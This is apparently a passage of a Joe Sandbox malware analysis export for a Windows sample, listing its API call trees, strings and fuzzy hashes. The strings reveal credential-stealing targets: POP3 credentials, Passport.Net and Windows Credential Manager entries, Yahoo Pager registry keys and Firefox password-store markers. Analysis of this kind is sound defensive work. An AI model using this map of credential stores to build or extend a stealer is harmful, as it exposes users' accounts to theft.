                          • memset.MSVCRT ref: 0040810E
                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          Similarity
                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                          • String ID: POP3_credentials$POP3_host$POP3_name
                          • API String ID: 524865279-2190619648
                          • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                          • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                          • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                          • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetstrchr
                          • String ID: 0$6
                          • API String ID: 2300387033-3849865405
                          • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                          • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                          • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                          • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                          Similarity
                          • API ID: memcpystrlen$memsetsprintf
                          • String ID: %s (%s)
                          • API String ID: 3756086014-1363028141
                          • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                          • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                          • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                          • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                          Similarity
                          • API ID: _mbscat$memsetsprintf
                          • String ID: %2.2X
                          • API String ID: 125969286-791839006
                          • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                          • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                          • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                          • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                          APIs
                          • memset.MSVCRT ref: 004091EC
                          • sprintf.MSVCRT ref: 00409201
                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                            • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                          • SetWindowTextA.USER32(?,?), ref: 00409228
                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                          Similarity
                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                          • String ID: caption$dialog_%d
                          • API String ID: 2923679083-4161923789
                          • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                          • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                          • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                          • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                          Strings
                          • no such savepoint: %s, xrefs: 00426A02
                          • unknown error, xrefs: 004277B2
                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                          • abort due to ROLLBACK, xrefs: 00428781
                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                          Similarity
                          • API ID: memcpy
                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                          • API String ID: 3510742995-3035234601
                          • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                          • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                          • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                          • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                          Similarity
                          • API ID: memset
                          • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                          • API String ID: 2221118986-3608744896
                          • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                          • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                          • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                          • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                          APIs
                          • memcpy.MSVCRT ref: 00442A5E
                            • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                          Similarity
                          • API ID: memcmpmemcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$temp
                          • API String ID: 1784268899-4153596280
                          • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                          • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                          • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                          • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                          • memset.MSVCRT ref: 00410246
                          • memset.MSVCRT ref: 00410258
                            • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                          • memset.MSVCRT ref: 0041033F
                          • _mbscpy.MSVCRT ref: 00410364
                          • CloseHandle.KERNEL32(?), ref: 004103AE
                          Similarity
                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                          • String ID:
                          • API String ID: 3974772901-0
                          • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                          • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                          • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                          • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                          APIs
                          • wcslen.MSVCRT ref: 0044406C
                          • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                          • strlen.MSVCRT ref: 004440D1
                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                          • memcpy.MSVCRT ref: 004440EB
                          • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                          Similarity
                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                          • String ID:
                          • API String ID: 577244452-0
                          • Opcode ID: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                          • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                          • Opcode Fuzzy Hash: b68bf44ff0a216cc051a87f20d5bcca37ca8fef9720e645d8a392b89cae1757c
                          • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                          APIs
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • _strcmpi.MSVCRT ref: 00404518
                          • _strcmpi.MSVCRT ref: 00404536
                          Similarity
                          • API ID: _strcmpi$memcpystrlen
                          • String ID: imap$pop3$smtp
                          • API String ID: 2025310588-821077329
                          • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                          • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                          • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                          • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                          APIs
                          • memset.MSVCRT ref: 0040C02D
                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                            • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                          Similarity
                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                          • API String ID: 2726666094-3614832568
                          • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                          • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                          • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                          • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                          APIs
                          • memset.MSVCRT ref: 00403A88
                          • memset.MSVCRT ref: 00403AA1
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                          • strlen.MSVCRT ref: 00403AE9
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                          Similarity
                          • API ID: ByteCharMultiWidememset$FileWritestrlen
                          • String ID:
                          • API String ID: 1786725549-0
                          • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                          • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                          • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                          • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                          APIs
                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                          • OpenClipboard.USER32(?), ref: 0040C1B1
                          • GetLastError.KERNEL32 ref: 0040C1CA
                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                          Similarity
                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                          • String ID:
                          • API String ID: 2014771361-0
                          • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                          • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                          • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                          APIs
                          • memcmp.MSVCRT ref: 00406151
                            • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                          • memcmp.MSVCRT ref: 0040617C
                          • memcmp.MSVCRT ref: 004061A4
                          • memcpy.MSVCRT ref: 004061C1
                          Similarity
                          • API ID: memcmp$memcpy
                          • String ID: global-salt$password-check
                          • API String ID: 231171946-3927197501
                          • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                          • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                          • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                          • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                          • Opcode Fuzzy Hash: 729e63cf5715f59118fe9d1a7c2076f24b1191d02e23bde904ada99bcc76db32
                          • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004016A3
                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                          • BeginPaint.USER32(?,?), ref: 004016D7
                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                          • EndPaint.USER32(?,?), ref: 004016F3
                          Similarity
                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                          • String ID:
                          • API String ID: 19018683-0
                          • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                          • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                          • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                          • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                          APIs
                          • memset.MSVCRT ref: 0040644F
                          • memcpy.MSVCRT ref: 00406462
                          • memcpy.MSVCRT ref: 00406475
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                          • memcpy.MSVCRT ref: 004064B9
                          • memcpy.MSVCRT ref: 004064CC
                          • memcpy.MSVCRT ref: 004064F9
                          • memcpy.MSVCRT ref: 0040650E
                            • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                          Similarity
                          • API ID: memcpy$memset
                          • String ID:
                          • API String ID: 438689982-0
                          • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                          • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                          • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                          APIs
                          • memset.MSVCRT ref: 0044495F
                          • memset.MSVCRT ref: 00444978
                          • memset.MSVCRT ref: 0044498C
                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                          • strlen.MSVCRT ref: 004449A8
                          • memcpy.MSVCRT ref: 004449CD
                          • memcpy.MSVCRT ref: 004449E3
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                          • memcpy.MSVCRT ref: 00444A23
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                          Similarity
                          • API ID: memcpymemset$strlen
                          • String ID:
                          • API String ID: 2142929671-0
                          • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                          • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                          • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                          • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                          APIs
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                          • strlen.MSVCRT ref: 0040F7BE
                          • _mbscpy.MSVCRT ref: 0040F7CF
                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                          Similarity
                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                          • String ID: Passport.Net\*
                          • API String ID: 2329438634-3671122194
                          • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                          • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                          APIs
                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                          • memset.MSVCRT ref: 0040330B
                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                          • strchr.MSVCRT ref: 0040335A
                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                          • strlen.MSVCRT ref: 0040339C
                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                          Similarity
                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                          • String ID: Personalities
                          • API String ID: 2103853322-4287407858
                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                          APIs
                          • memset.MSVCRT ref: 00444573
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                            • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValuememset
                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                          • API String ID: 1830152886-1703613266
                          • Opcode ID: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                          • Opcode Fuzzy Hash: 92186b2843cb95c86930638de19930e82a7f4a8b6566e79db89fa237099746d1
                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                          APIs
                          Strings
                          • unknown column "%s" in foreign key definition, xrefs: 00430C59
                          • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                          • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                          • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                          • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: H
                          • API String ID: 2221118986-2852464175
                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                          • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                          • API String ID: 3510742995-3170954634
                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                          • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: winWrite1$winWrite2
                          • API String ID: 438689982-3457389245
                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                          • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: winRead
                          • API String ID: 1297977491-2759563040
                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                          • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                          • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                          APIs
                          • GetParent.USER32(?), ref: 004090C2
                          • GetWindowRect.USER32(?,?), ref: 004090CF
                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
